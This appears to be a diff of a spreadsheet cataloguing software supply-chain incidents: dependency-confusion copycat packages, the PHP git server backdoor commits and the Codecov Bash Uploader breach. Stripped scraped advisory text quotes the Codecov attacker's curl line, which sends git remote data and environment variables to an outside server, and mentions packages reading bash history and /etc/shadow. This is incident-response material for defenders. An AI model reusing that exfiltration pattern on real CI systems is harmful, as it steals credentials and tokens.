-          <t>['navigation', 'back', 'platform', 'platform', 'overview', 'automate', 'software', 'supply', 'chain', 'sonatype', 'repository', 'firewall', 'block', 'malicious', 'open', 'source', 'door', 'sonatype', 'repository', 'fast', 'component', 'lifecycle', 'control', 'open', 'source', 'risk', 'manager', 'compliance', 'monitoring', 'work', 'tool', 'language', 'package', 'solution', 'innovation', 'align', 'team', 'secure', 'deployment', 'developer', 'quality', 'code', 'fast', 'application', 'vulnerability', 'risk', 'legal', 'compliance', 'enforce', 'policy', 'scale', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'pricing', 'resource', 'resource', 'download', 'webinar', 'series', 'state', 'software', 'supply', 'chain', 'blog', 'webinar', 'whitepaper', 'launchpad', 'customer', 'story', 'free', 'tool', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'customer', 'resource', 'training', 'workshop', 'documentation', 'support', 'partner', 'partner', 'extensive', 'sonatype', 'partner', 'network', 'partner', 'connect', 'sonatype', 'partner', 'company', 'software', 'supply', 'chain', 'management', 'story', 'career', 'opportunity', 'event', 'virtual', 'learning', 'event', 'newsroom', 'date', 'sonatype', 'news', 'contact', 'talk', 'software', 'supply', 'chain', 'book', 'demo', 'book', 'demo', 'book', 'demo', 'dependency', 'confusion', 'copycat', 'read', 'time', 'share', 'week', 'vigilante', 'actor', 'pypi', 'repository', 'confusion', 'package', 'sonatype', 'malicious', 'dependency', 'confusion', 'package', 'amazon', 'zillow', 'slack', 'package', 'pypi', 'attention', 'software', 'supply', 'chain', 'attack', 'great', 'identical', 'package', 'yesterday', 'admin', 'python', 'package', 'remindsupplychainrisk', 'text', 'benign', 'request', 'sonatype', 'information', 'actor', 'identical', 'package', 'analysis', 'package', 'user', 'remindsupplychainrisk', 'disclaimer', 'remindsupplychainrisk', 'purpose', 'attention', 'software', 'supply', 'chain', 'attack', 'great', 'copycat', 'request', 'pypi', 'package', 'actor', 'minimal', 'code', 'dependency', 'hijacking', 'copycat', 'packagejson', 'manifest', 'file', 'package', 'example', 'activemq', 'dependency', 'confusion', 'package', 'popular', 'component', 'npm', 'remindsupplychainrisk', 'exact', 'structure', 'activemq', 'simple', 'request', 'aforementioned', 'address', 'package', 'minimal', 'sonatype', 'package', 'malicious', 'activity', 'analyze', 'package', 'user', 'cautious', 'dependency', 'vulnerable', 'dependency', 'confusion', 'early', 'report', 'week', 'malicious', 'dependency', 'confusion', 'copycat', 'considered', 'ethical', 'hacking', 'sensitive', 'system', 'file', 'bashhistory', 'etcshadow', 'dependency', 'confusion', 'problem', 'week', 'original', 'report', 'chain', 'attack', 'tech', 'firm', 'dependency', 'confusion', 'copycat', 'recent', 'copycat', 'statistic', 'large', 'value', 'daily', 'volume', 'suspicious', 'package', 'sonatype', 'malware', 'detection', 'system', 'trend', 'adversary', 'dependency', 'confusion', 'sinister', 'activity', 'sonatype', 'customer', 'advanced', 'development', 'pack', 'additional', 'protection', 'malware', 'detection', 'system', 'worldclass', 'research', 'furthermo', 'sonatype', 'repository', 'firewall', 'suspicious', 'component', 'malware', 'detection', 'system', 'manual', 'review', 'researcher', 'software', 'supply', 'chain', 'user', 'nexus', 'repository', 'manager', 'sonatype', 'dependencynamespace', 'confusion', 'checker', 'script', 'artifact', 'name', 'repository', 'dependency', 'confusion', 'attack', 'sonatype', 'state', 'software', 'supply', 'chain', 'upstream', 'software', 'supply', 'chain', 'attack', 'sinister', 'actor', 'public', 'vulnerability', 'disclosure', 'initiative', 'contribute', 'code', 'open', 'source', 'project', 'unbeknownst', 'project', 'malicious', 'code', 'code', 'change', 'open', 'source', 'project', 'feed', 'software', 'supply', 'chain', 'developer', 'world', 'rate', 'rate', 'fact', 'upstream', 'software', 'supply', 'chain', 'attack', 'year', 'mind', 'impossible', 'track', 'component', 'sonatype', 'worldclass', 'research', 'datum', 'malware', 'detection', 'technology', 'developer', 'customer', 'software', 'supply', 'chain', 'infection', 'tag', 'vulnerability', 'nexus', 'intelligence', 'insight', 'confusion', 'researcher', 'sonatype', 'engineer', 'passion', 'perpetual', 'learning', 'work', 'expert', 'analysis', 'medium', 'outlet', 'expertise', 'vulnerability', 'research', 'reverse', 'engineering', 'software', 'development', 'spare', 'time', 'vulnerability', 'wide', 'range', 'audience', 'author', 'topic', 'post', 'open', 'source', 'attacker', 'next', 'package', 'curious', 'case', 'csrfmagic', 'case', 'study', 'supply', 'chain', 'sharma', 'overload', 'crisis', 'vulnerability', 'management', 'package', 'vulnerability', 'connect', 'ssrf', 'vulnerability', 'vulnerability', 'software', 'supply', 'chain', 'platform', 'platform', 'overview', 'firewall', 'repository', 'lifecycle', 'sbom', 'manager', 'pricing', 'product', 'container', 'auditor', 'legal', 'pack', 'lifecycle', 'foundation', 'solution', 'role', 'innovation', 'developer', 'legal', 'compliance', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'community', 'free', 'tool', 'nexus', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'resource', 'update', 'blog', 'whitepaper', 'ebook', 'customer', 'story', 'partner', 'partner', 'partner', 'amazon', 'customer', 'portal', 'training', 'workshop', 'documentation', 'sonatype', 'customer', 'support', 'company', 'career', 'newsroom', 'contact', 'press', 'center', 'late', 'software', 'news', 'event', 'term', 'service', 'privacy', 'policy', 'modern', 'slavery', 'statement', 'event', 'term', 'condition', 'personal', 'information', 'copyright', 'sonatype', 'right', 'thirdparty', 'code', 'sonatype', 'sonatype', 'nexus', 'trademark', 'sonatype', 'trademark', 'foundation', 'trademark', 'property', 'respective', 'owner']</t>
         </is>
       </c>
     </row>
@@ -4750,17 +4095,12 @@
       </c>
       <c r="C166" t="inlineStr">
         <is>
-          <t>lists downloads documentation involved help menu downloads documentation involved help mailing lists phpinternals changes commit workflow changes commit workflow nikita popov date subject changes commit workflow groups phpdoc phpinternals everyone yesterday malicious commits pushed phpsrc repo names rasmus lerdorf dont know exactly happened everything points towards compromise gitphpnet server rather compromise individual account investigation still underway decided maintaining infrastructure unnecessary risk discontinue gitphpnet server instead repositories github previously mirrors become canonical means changes pushed directly github rather gitphpnet previously write access repositories handled homegrown karma system need part organization github part organization dont access repository access contact nikicphpnet phpnet github account names well permissions youre currently missing membership organization requires enabled change also means possible merge pull requests directly github interface reviewing repositories corruption beyond referenced commits please contact securityphpnet notice anything regards nikita httpsgithubcomphpphpsrccommitc730aa26bd52829a49f2ad284b181b7e82a68d7d httpsgithubcomphpphpsrccommit2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a previous phpinternals next copyright group phpnet contact phpnet sites mirror sites privacy policy</t>
+          <t>Two malicious commits were pushed to the php-src repo that introduced a backdoor into PHP.  It is believed that the git server was compromised and not the accounts of the maintainers who appear to have committed the code.</t>
         </is>
       </c>
       <c r="D166" t="inlineStr">
         <is>
           <t>https://news-web.php.net/php.internals/113838</t>
-        </is>
-      </c>
-      <c r="E166" t="inlineStr">
-        <is>
-          <t>['list', 'documentation', 'help', 'menu', 'documentation', 'help', 'mailing', 'list', 'phpinternal', 'change', 'workflow', 'change', 'workflow', 'date', 'subject', 'change', 'workflow', 'group', 'phpdoc', 'yesterday', 'malicious', 'commit', 'point', 'compromise', 'gitphpnet', 'server', 'individual', 'account', 'investigation', 'infrastructure', 'unnecessary', 'risk', 'server', 'mirror', 'canonical', 'change', 'gitphpnet', 'access', 'repository', 'system', 'part', 'organization', 'repository', 'access', 'contact', 'account', 'name', 'permission', 'membership', 'organization', 'change', 'possible', 'request', 'repository', 'corruption', 'referenced', 'commit', 'contact', 'securityphpnet', 'previous', 'phpinternal', 'next', 'copyright', 'group', 'phpnet', 'contact', 'phpnet', 'site', 'site', 'privacy', 'policy']</t>
         </is>
       </c>
     </row>
@@ -4777,17 +4117,12 @@
       </c>
       <c r="C167" t="inlineStr">
         <is>
-          <t>product features integrations docs status docs customers blog pricing help support enterprise support community contact login github gitlab bitbucket sentry started product overview features integrations getting started documentation status customers blog docs pricing contact login april 15th bash uploader update started free login codecov free update investigation additional information concerning environment variables obtained without authorization used affected users view details within codecov application additionally posted uptodate iocs note affected user group thursday april 15th emailed email address file github gitlab bitbucket added notification banner codecov application indicators compromise iocs modified portion bash uploader script follows curl “git remote env” https ipaddress uploadv2 true addresses data transmitted bash script windows time malicious bash uploader affected confident based analysis change ever made bash uploader change recently obtained nonexhaustive redacted environment variables evidence compromised also evidence compromised variables used please login codecov soon possible affected population known scope originating used modify bash script destination addresses data transmitted bash script used curl call line addresses identified investigation likely related actor associated accounts related incident confirmed codecov event codecov takes systems data seriously implemented numerous safeguards protect thursday april learned someone gained unauthorized access bash uploader script modified without permission actor gained access error codecov’s docker image creation process allowed actor extract credential required modify bash uploader script immediately upon becoming aware issue codecov secured remediated affected script began investigating potential impact users thirdparty forensic firm engaged assist analysis reported matter enforcement fully cooperating investigation investigation determined beginning january periodic unauthorized alterations bash uploader script third party enabled potentially export information stored users continuous integration environments information sent thirdparty server outside codecov’s infrastructure bash uploader also used related uploaders codecovactions uploader github codecov circlecl codecov bitrise step together “bash uploaders” therefore related uploaders also impacted event altered version bash uploader script could potentially affect credentials tokens keys customers passing runner would accessible bash uploader script executed services datastores application code could accessed credentials tokens keys remote information origin repository repositories using bash uploaders upload coverage codecov recommend actions affected users commitment trust transparency worked diligently determine potential impact customers identify customers used bash uploaders relevant time periods affected users emailed april 15th using email address file github gitlab bitbucket notification banner codecov strongly recommend affected users immediately reroll credentials tokens keys located environment variables processes used codecov’s bash uploaders determine keys tokens surfaced environment running command pipeline anything returned command considered private sensitive strongly recommend invalidating credential generating additionally would recommend audit tokens system specifically bash script altered follows curl “git remote env” https redacted uploadv2 true note address third party server redacted currently part ongoing federal investigation additionally locally stored version bash uploader check version following curl “git remote appears anywhere locally stored bash uploader immediately replace bash files recent version httpscodecoviobash selfhosted onpremises version codecov unlikely impacted impacted pipeline would need fetching bash uploader httpscodecoviobash instead selfhosted codecov installation verify fetching bash uploader looking pipeline configuration conducted checksum comparison using bash uploaders part processes issue impact actions taken codecov taken number steps address situation including rotating relevant internal credentials including used facilitate modification bash uploader auditing accessible setting monitoring auditing tools ensure kind unintended change cannot occur bash uploader working hosting provider thirdparty server ensure malicious webserver properly decommissioned codecov maintains variety information policies procedures practices controls continually monitor network systems unusual activity codecov like company immune type event also working enhance stay ahead type activity including reinforcing tools policies procedures continue share much information able encourage reach questions concerns securitycodecovio value trust place solutions pledge continuously work earn regret inconvenience cause committed minimizing potential impact users customers sincerely jerrod engelberg codecov faqs codecov bash uploader expand codecov bash uploader provides framework languageagnostic method sending coverage reports codecov main objectives uploader detect specific settings environment gather reports upload information codecov learn bash uploader case third party integrations bash uploader used provide core upload functionality needed properly integrate codecov uploaders include codecovaction codecov github action codecovcircleciorb codecov circle codecovbitrisestep bitrise step supported uploaders codecovruby codecov’s node uploader package community contributed upload implementations utilize bash uploader codecov learn event expand customer reported morning april customer using shasum available bash uploader confirm integrity uploader fetched httpscodecoviobash customer discrepancy shasum github shasum calculated downloaded bash uploader reported issue prompted investigation event occur expand based upon forensic investigation results date appears periodic unauthorized access google cloud storage beginning january allowed malicious thirdparty alter version bash uploader script potentially export information subject continuous integration thirdparty server codecov secured remediated script april responsible event expand able determine conclusively carried event working enforcement offered full cooperation investigation types information accessed event expand altered version bash uploader script could potentially affect credentials tokens keys customers passing runner would accessible bash uploader script executed services datastores application code could accessed credentials tokens keys remote information origin repository repositories using bash uploader upload coverage codecov notified appropriate authorities expand reported matter enforcement fully cooperating investigation disclose event sooner expand since discovering event codecov conducting investigation forensics experts understand happened potential impact users investigations complex working learn happened data impacted took care time able obtain deliver accurate information didn’t receive communication codecov affected expand affected contacted users email accounts posted notification abundance caution used bash uploaders january april conduct checksum validation bash uploader would suggest reroll credentials tokens keys located environment variables process determine keys tokens surfaced environment running command pipeline anything returned command considered private sensitive strongly recommend invalidating credential generating additionally would recommend audit tokens system additionally customers locally stored version bash uploader check version following curl “git remote appears anywhere locally stored bash uploader immediately replace bash files recent version httpscodecoviobash lastly selfhosted onpremises version codecov unlikely impacted impacted pipeline would need fetching bash uploader httpscodecoviobash instead selfhosted codecov installation verify fetching bash uploader looking pipeline configuration bash uploader also used related uploaders codecovactions uploader github codecov circleci codecov bitrise step together “bash uploaders” know impacted event expand still actively assessing impact event customers contacted users email accounts posted notification abundance caution used codecovbash bash uploader codecovaction github codecovcircleciorb codecovbitrisestep january april conduct checksum validation would suggest reroll credentials tokens keys located environment variables process need take action impacted expand altered version bash uploader script could potentially affect credentials tokens keys customers passing runner would accessible bash uploader script executed services datastores application code could accessed credentials tokens keys remote information origin repository repositories using bash uploader upload coverage codecov immediately reroll credentials tokens keys located environment variables process determine keys tokens surfaced environment running command pipeline anything returned command considered private sensitive strongly recommend invalidating credential generating additionally would recommend audit tokens system additionally locally stored version bash uploader check version following curl “git remote appears anywhere locally stored bash uploader immediately replace base files recent version httpscodecoviobash lastly selfhosted onpremises version codecov unlikely impacted impacted pipeline would need fetching bash uploader httpscodecoviobash instead selfhosted codecov installation verify fetching bash uploader looking pipeline configuration know environment variables mine available actor expand determine keys tokens surfaced environment running command pipeline anything returned command considered private sensitive strongly recommend invalidating credential generating additionally would recommend audit tokens system multiple repositories using codecov know repositories affected expand abundance caution look repository organizations used codecovs bash uploaders april require assistance pinpointing potentially impacted repositories contact securitycodecovio assist process bash uploader also used related uploaders codecovactions uploader github codecov circlecl codecov bitrise step together “bash uploaders” codecov plan support regard event expand making team available customers time please hesitate reach securitycodecovio andor codecov account manager safe codecov systems services expand codecov takes systems data seriously implemented numerous safeguards protect codecov maintains variety information policies procedures practices controls continually monitor network systems unusual activity codecov like company immune type event taken number steps address situation including rotating credentials including used facilitate event auditing accessible setting monitoring auditing tools ensure cannot occur bash uploader working hosting provider thirdparty server ensure malicious webserver properly decommissioned auditable additional information also working enhance stay ahead type activity including reinforcing tools policies procedures well governance staffing codecov’s selfhosted onprem offering could impacted expand selfhosted onpremises version codecov unlikely impacted impacted pipeline would need fetching bash uploader httpscodecoviobash instead selfhosted codecov installation verify fetching bash uploader looking pipeline configuration addressed event steps taken ensure occur expand immediately upon becoming aware issue codecov secured remediated potentially affected script began investigating extent users impacted codecov maintains variety information policies procedures practices controls continually monitor network systems unusual activity codecov like company immune type event taken number steps address situation including rotating credentials including used facilitate event auditing accessible setting monitoring auditing tools ensure cannot occur bash uploader working hosting provider thirdparty server ensure malicious webserver properly decommissioned auditable additional information also working enhance stay ahead type activity including reinforcing tools policies procedures product features integrations documentation status solutions open source enterprise startups education customers customers case studies community resources webinars blog documentation company team press careers contact contact demo support enterprise support community board terms service privacy gdpr data processing addendum sentry registered trademark functional software redirect github order codecov admin must approve continue github continue github public repos</t>
+          <t>Someone updated the CodeCov Bash Uploader script to export information stored in CI systems.  Access was obtained through an error in Codecov's Docker image creation process that allowed the actor to extract the credential required to modify their Bash Uploader script.</t>
         </is>
       </c>
       <c r="D167" t="inlineStr">
         <is>
           <t>https://about.codecov.io/security-update/</t>
-        </is>
-      </c>
-      <c r="E167" t="inlineStr">
-        <is>
-          <t>['product', 'integration', 'doc', 'status', 'customer', 'blog', 'pricing', 'help', 'enterprise', 'support', 'community', 'contact', 'login', 'sentry', 'product', 'overview', 'feature', 'integration', 'documentation', 'status', 'customer', 'blog', 'doc', 'contact', 'login', '15th', 'bash', 'uploader', 'update', 'free', 'login', 'update', 'investigation', 'additional', 'information', 'environment', 'variable', 'authorization', 'user', 'detail', 'application', 'uptodate', 'ioc', 'user', 'group', '15th', 'email', 'address', 'file', 'notification', 'banner', 'codecov', 'application', 'indicator', 'portion', 'bash', 'uploader', 'script', 'curl', 'remote', 'env', 'https', 'ipaddress', 'uploadv2', 'true', 'address', 'datum', 'bash', 'script', 'window', 'time', 'malicious', 'bash', 'uploader', 'confident', 'analysis', 'change', 'bash', 'uploader', 'change', 'nonexhaustive', 'environment', 'variable', 'evidence', 'evidence', 'variable', 'possible', 'affected', 'population', 'scope', 'bash', 'script', 'destination', 'address', 'datum', 'bash', 'script', 'curl', 'call', 'line', 'address', 'investigation', 'actor', 'account', 'incident', 'event', 'system', 'datum', 'numerous', 'safeguard', 'protect', 'unauthorized', 'access', 'bash', 'uploader', 'script', 'permission', 'actor', 'access', 'error', 'docker', 'image', 'creation', 'process', 'actor', 'credential', 'modify', 'bash', 'uploader', 'script', 'aware', 'issue', 'affected', 'script', 'potential', 'impact', 'user', 'thirdparty', 'forensic', 'firm', 'analysis', 'matter', 'enforcement', 'investigation', 'investigation', 'periodic', 'unauthorized', 'alteration', 'uploader', 'script', 'third', 'party', 'export', 'information', 'user', 'continuous', 'integration', 'environment', 'information', 'thirdparty', 'server', 'infrastructure', 'bash', 'uploader', 'related', 'uploader', 'codecovaction', 'bitrise', 'step', 'bash', 'uploader', 'uploader', 'event', 'version', 'bash', 'uploader', 'script', 'credential', 'token', 'customer', 'runner', 'bash', 'uploader', 'script', 'service', 'datastore', 'application', 'code', 'credential', 'token', 'remote', 'information', 'origin', 'repository', 'repository', 'bash', 'uploader', 'coverage', 'action', 'user', 'commitment', 'trust', 'transparency', 'potential', 'impact', 'customer', 'customer', 'bash', 'relevant', 'time', 'period', 'user', '15th', 'email', 'address', 'file', 'notification', 'banner', 'user', 'credential', 'token', 'key', 'environment', 'variable', 'process', 'bash', 'uploader', 'key', 'token', 'environment', 'command', 'pipeline', 'command', 'private', 'sensitive', 'credential', 'generating', 'audit', 'token', 'system', 'bash', 'script', 'remote', 'env', 'https', 'uploadv2', 'true', 'note', 'address', 'party', 'server', 'part', 'ongoing', 'federal', 'investigation', 'version', 'bash', 'uploader', 'check', 'version', 'curl', 'bash', 'uploader', 'bash', 'file', 'recent', 'version', 'httpscodecoviobash', 'onpremise', 'pipeline', 'bash', 'uploader', 'httpscodecoviobash', 'installation', 'bash', 'pipeline', 'configuration', 'checksum', 'comparison', 'bash', 'part', 'process', 'issue', 'impact', 'action', 'number', 'step', 'address', 'situation', 'relevant', 'internal', 'credential', 'facilitate', 'modification', 'bash', 'auditing', 'accessible', 'auditing', 'tool', 'kind', 'unintended', 'change', 'bash', 'uploader', 'provider', 'thirdparty', 'server', 'malicious', 'webserver', 'variety', 'information', 'policy', 'procedure', 'practice', 'control', 'network', 'system', 'unusual', 'activity', 'codecov', 'company', 'immune', 'type', 'event', 'enhance', 'ahead', 'type', 'activity', 'tool', 'policy', 'procedure', 'much', 'information', 'able', 'question', 'concern', 'securitycodecovio', 'value', 'trust', 'place', 'solution', 'potential', 'impact', 'user', 'customer', 'bash', 'uploader', 'bash', 'uploader', 'framework', 'languageagnostic', 'method', 'coverage', 'report', 'codecov', 'main', 'objective', 'specific', 'setting', 'environment', 'report', 'information', 'bash', 'uploader', 'case', 'party', 'integration', 'uploader', 'core', 'upload', 'functionality', 'codecov', 'uploader', 'step', 'uploader', 'node', 'uploader', 'package', 'community', 'upload', 'implementation', 'bash', 'uploader', 'codecov', 'learn', 'event', 'customer', 'morning', 'customer', 'available', 'bash', 'uploader', 'integrity', 'uploader', 'httpscodecoviobash', 'customer', 'bash', 'uploader', 'issue', 'investigation', 'event', 'forensic', 'investigation', 'result', 'date', 'periodic', 'unauthorized', 'access', 'beginning', 'malicious', 'thirdparty', 'version', 'bash', 'uploader', 'script', 'export', 'information', 'subject', 'continuous', 'integration', 'thirdparty', 'server', 'script', 'responsible', 'event', 'able', 'event', 'enforcement', 'full', 'cooperation', 'investigation', 'information', 'event', 'version', 'bash', 'uploader', 'script', 'credential', 'token', 'customer', 'runner', 'bash', 'uploader', 'script', 'service', 'datastore', 'application', 'code', 'credential', 'token', 'remote', 'information', 'origin', 'repository', 'repository', 'bash', 'uploader', 'upload', 'coverage', 'appropriate', 'authority', 'matter', 'enforcement', 'investigation', 'event', 'event', 'codecov', 'investigation', 'forensic', 'expert', 'potential', 'impact', 'user', 'investigation', 'complex', 'working', 'learn', 'datum', 'care', 'time', 'able', 'accurate', 'information', 'communication', 'codecov', 'affected', 'expand', 'user', 'email', 'account', 'notification', 'abundance', 'caution', 'bash', 'uploader', 'conduct', 'checksum', 'validation', 'bash', 'uploader', 'credential', 'token', 'key', 'environment', 'variable', 'process', 'key', 'token', 'environment', 'command', 'pipeline', 'command', 'private', 'sensitive', 'credential', 'generating', 'audit', 'token', 'system', 'customer', 'version', 'bash', 'uploader', 'check', 'version', 'curl', 'bash', 'uploader', 'bash', 'file', 'recent', 'version', 'httpscodecoviobash', 'onpremise', 'version', 'pipeline', 'bash', 'uploader', 'httpscodecoviobash', 'installation', 'bash', 'pipeline', 'configuration', 'bash', 'uploader', 'related', 'uploader', 'codecovaction', 'bitrise', 'step', 'bash', 'uploader', 'event', 'impact', 'event', 'customer', 'user', 'email', 'account', 'notification', 'abundance', 'caution', 'uploader', 'codecovaction', 'conduct', 'checksum', 'validation', 'credential', 'token', 'key', 'environment', 'variable', 'process', 'action', 'version', 'bash', 'uploader', 'script', 'credential', 'token', 'customer', 'runner', 'bash', 'uploader', 'script', 'service', 'datastore', 'application', 'code', 'credential', 'token', 'remote', 'information', 'origin', 'repository', 'repository', 'bash', 'uploader', 'upload', 'coverage', 'credential', 'token', 'key', 'environment', 'variable', 'process', 'key', 'token', 'environment', 'command', 'pipeline', 'command', 'private', 'sensitive', 'credential', 'generating', 'audit', 'token', 'system', 'version', 'bash', 'uploader', 'check', 'version', 'curl', 'bash', 'uploader', 'base', 'file', 'recent', 'version', 'httpscodecoviobash', 'onpremise', 'version', 'pipeline', 'bash', 'uploader', 'httpscodecoviobash', 'installation', 'bash', 'pipeline', 'configuration', 'environment', 'available', 'actor', 'key', 'token', 'environment', 'command', 'pipeline', 'command', 'private', 'sensitive', 'credential', 'generating', 'audit', 'token', 'system', 'multiple', 'repository', 'know', 'repository', 'abundance', 'caution', 'repository', 'organization', 'codecovs', 'bash', 'uploader', 'assistance', 'repository', 'contact', 'securitycodecovio', 'process', 'bash', 'uploader', 'related', 'uploader', 'codecovaction', 'bitrise', 'step', 'bash', 'uploader', 'plan', 'support', 'regard', 'event', 'team', 'available', 'customer', 'time', 'manager', 'safe', 'system', 'service', 'system', 'datum', 'numerous', 'safeguard', 'variety', 'information', 'policy', 'procedure', 'practice', 'control', 'network', 'system', 'unusual', 'activity', 'codecov', 'company', 'immune', 'type', 'event', 'number', 'step', 'address', 'situation', 'credential', 'facilitate', 'event', 'accessible', 'auditing', 'tool', 'bash', 'uploader', 'provider', 'thirdparty', 'server', 'malicious', 'webserver', 'auditable', 'additional', 'information', 'enhance', 'ahead', 'type', 'activity', 'tool', 'policy', 'procedure', 'governance', 'staffing', 'offering', 'onpremise', 'version', 'pipeline', 'bash', 'uploader', 'httpscodecoviobash', 'installation', 'bash', 'pipeline', 'configuration', 'event', 'step', 'aware', 'issue', 'affected', 'script', 'extent', 'user', 'variety', 'information', 'policy', 'procedure', 'practice', 'control', 'network', 'system', 'unusual', 'activity', 'codecov', 'company', 'immune', 'type', 'event', 'number', 'step', 'address', 'situation', 'credential', 'facilitate', 'event', 'accessible', 'auditing', 'tool', 'bash', 'uploader', 'provider', 'thirdparty', 'server', 'malicious', 'webserver', 'auditable', 'additional', 'information', 'enhance', 'ahead', 'type', 'activity', 'tool', 'policy', 'procedure', 'product', 'feature', 'integration', 'documentation', 'status', 'solution', 'open', 'source', 'enterprise', 'startup', 'education', 'customer', 'customer', 'case', 'study', 'community', 'resource', 'blog', 'documentation', 'company', 'team', 'press', 'career', 'contact', 'contact', 'demo', 'support', 'enterprise', 'support', 'community', 'board', 'term', 'service', 'privacy', 'processing', 'sentry', 'trademark', 'functional', 'software', 'redirect', 'order', 'public', 'repos']</t>
         </is>
       </c>
     </row>
@@ -4804,17 +4139,12 @@
       </c>
       <c r="C168" t="inlineStr">
         <is>
-          <t>subscribe join community software engineering leaders aspirational developers always stay intheknow getting important news exclusive content delivered fresh inbox learn atscale software development email address required subscribe resubscription required seems youve previously unsubscribed newsletter past click button open resubscribe form youre done simply close continue form complete subscription resubscribe stack sell information share unaffiliated third parties continuing agree terms privacy policy welcome thank joining stack community please answer simple questions help deliver news resources interested first name required last name required company name required country required select united states canada india united kingdom germany france afghanistan albania algeria american samoa andorra angola anguilla antarctica antigua barbuda argentina armenia aruba asiapacific region australia austria azerbaijan bahamas bahrain bangladesh barbados belarus belgium belize benin bermuda bhutan bolivia bonaire sint eustatius saba bosnia herzegovina botswana bouvet island brazil british indian ocean territory brunei darussalam bulgaria burkina faso burundi cambodia cameroon canada cape verde cayman islands central african republic chad chile china christmas island cocos keeling islands colombia comoros congo congo democratic republic cook islands costa rica croatia cuba curaçao cyprus czech republic côte divoire denmark djibouti dominica dominican republic ecuador egypt salvador equatorial guinea eritrea estonia ethiopia falkland islands malvinas faroe islands fiji finland france french guiana french polynesia french southern territories gabon gambia georgia germany ghana gibraltar greece greenland grenada guadeloupe guam guatemala guernsey guinea guineabissau guyana haiti heard island mcdonald islands holy vatican city state honduras hong kong hungary iceland india indonesia iran islamic republic iraq ireland isle israel italy jamaica japan jersey jordan kazakhstan kenya kiribati korea republic kuwait kyrgyzstan laos latvia lebanon lesotho liberia libyan arab jamahiriya liechtenstein lithuania luxembourg macao madagascar malawi malaysia maldives mali malta marshall islands martinique mauritania mauritius mayotte mexico micronesia federated states moldova republic monaco mongolia montenegro montserrat morocco mozambique myanmar namibia nauru nepal netherlands netherlands antilles caledonia zealand nicaragua niger nigeria niue norfolk island north korea north macedonia northern mariana islands norway oman pakistan palau palestinian territory occupied panama papua guinea paraguay peru philippines pitcairn islands poland portugal puerto rico qatar reunion romania russian federation rwanda saint barthélemy saint helena saint kitts nevis saint lucia saint martin saint martin saint pierre miquelon saint vincent grenadines samoa marino tome principe saudi arabia senegal serbia serbia montenegro seychelles sierra leone singapore sint maarten slovakia slovenia solomon islands somalia south africa south georgia south sandwich islands south sudan spain lanka sudan suriname svalbard mayen swaziland sweden switzerland syrian arab republic taiwan tajikistan tanzania united republic thailand timorleste togo tokelau tonga trinidad tobago tunisia turkey turkmenistan turks caicos islands tuvalu uganda ukraine united arab emirates united kingdom united states united states minor outlying islands uruguay uzbekistan vanuatu venezuela vietnam virgin islands british virgin islands wallis futuna western sahara yemen zambia zimbabwe åland islands zipcode required great meet tell cover topics find relevant level required select clevel vpdirector managersupervisor level senior nonmanagerial staff entry leveljunior staff freelancercontractor studentintern closely describes role required select developersoftware engineer sysadminoperationssre architect professional devops engineerteam community managerdeveloper advocate management including ciocisocto business developmentmarketingsales enthusiasthobbyist many employees organization work required select selfemployed working option best describes type organization work required select “end user” organization primarily uses products services support business deliverables hardware software vendor supplier cloud service provider managed service provider system integrator consulting firm following best describes organizations primary industry required select advertisingmarketing aerospaceaviation agriculture automotive biotechpharmaceutical business services accounting consulting computersinformation technology construction education facilitiesservice industry financefinancial services banking insurance government healthcare human resources legal life sciences biotech pharmaceuticals manufacturing media nonprofit real estate retailconsumer goods telecommunications transportationlogistics travelhospitalityentertainment utilityenergy linkedin profile required welcome we’re glad you’re expect best content arrive monday friday keep news game what’s next check inbox confirmation email adjust preferences even join additional groups follow favorite social media networks become follower linkedin check latest featured trending stories wait first newsletter prev next voxpop you’re productive when… recent post discussed factors make developers productive code best work interesting lots uninterrupted work time wellsupported good toolset understand entire code base equally productive time thanks opinion subscribe final results published exclusively update newsletter submit search results architecture cloud native ecosystem containers edge computing microservices networking serverless storage engineering frontend development software development management python javascript typescript webassembly cloud services data operations platform engineering operations cicd tech careers tech culture devops kubernetes observability service mesh channels podcasts ebooks events newsletter feeds stack contact sponsors sponsorship contributions podcasts ebooks events newsletter architecture engineering operations cloud native ecosystem containers edge computing microservices networking serverless storage kubecon24 openshift accelerates delivery 21st 940am steven vaughannichols kubecon24 victoriametrics simpler alternative prometheus 20th 114pm joab jackson open source journey greener cloud native environments 20th 635am graziano casto kubecon24 minio object store equipped enterprise features 19th 200pm joab jackson building polyglot developer experiences 19th 1014am mauricio salatino evolve manual templated dockerfiles automation 26th 1033am siva virtualization containers better together 19th 618am alex handy docker chainguard join forces deliver secure containers 18th 114pm steven vaughannichols simplify linux docker command lines bash completion 600am jack wallen observability multicluster developers best friend 742am asaf yigal future hybrid edge deployments indispensable 22nd 1000am luis ceze rapidai uses edge kubernetes boost stroke care 15th 1030am charles humble honey secured boot edge trusted boot kairos 14th 715am ettore giacinto architecting industrial workloads blueprint 31st 734am dunith danushka enabling apps cloudtoedge database 31st 611am mark gamble evolve manual templated dockerfiles automation 26th 1033am siva platform mobile engineering work together 22nd 900am usman siddiqui framework optimizing observability costs 20th 858am chris cooney transforming identity access management event sourcing 1000am dakshitha ratnayake observability multicluster developers best friend 742am asaf yigal observability different web3 apps 15th 1200pm sarah morgan simplify kubernetes hosted control planes k0smotron 11th 1000am jussi nummelin black hole kubernetes network 630am mitch connors netflix releases bpftop ebpfbased application monitor 27th 853am steven vaughannichols samba network shares rhelbased linux distributions 25th 600am jack wallen meet dbos database alternative kubernetes 12th 400am joab jackson pulumi templates genai stacks pinecone langchain first 21st 900am joab jackson cncf cloudevents message envelope travels 31st 400am joab jackson bringing serverless strategy azure 19th 600am siva serverless computing genai influence 500am chris preimesberger architect’s guide modern data lake reference architecture 26th 917am keith pijanowski cloud data migration cloud data tiering 25th 1000am kumar goswami kubecon24 minio object store equipped enterprise features 19th 200pm joab jackson architect’s guide reference architecture aiml data lake 19th 1209pm keith pijanowski reliable distributed storage baremetal capi clusters 18th 816am kevin reeuwijk frontend development software development management python javascript typescript webassembly cloud services data nvidia acceleration supercharged milvus vector database 26th 716am charles future hybrid edge deployments indispensable 22nd 1000am luis ceze introduce realtime data predictions redpanda 22nd 818am christina engine introduces aipowered search wordpress sites 22nd 744am loraine lawson software developers thinking climate 21st 122pm charles humble news wordpress angular signals components 23rd 400am loraine lawson engine 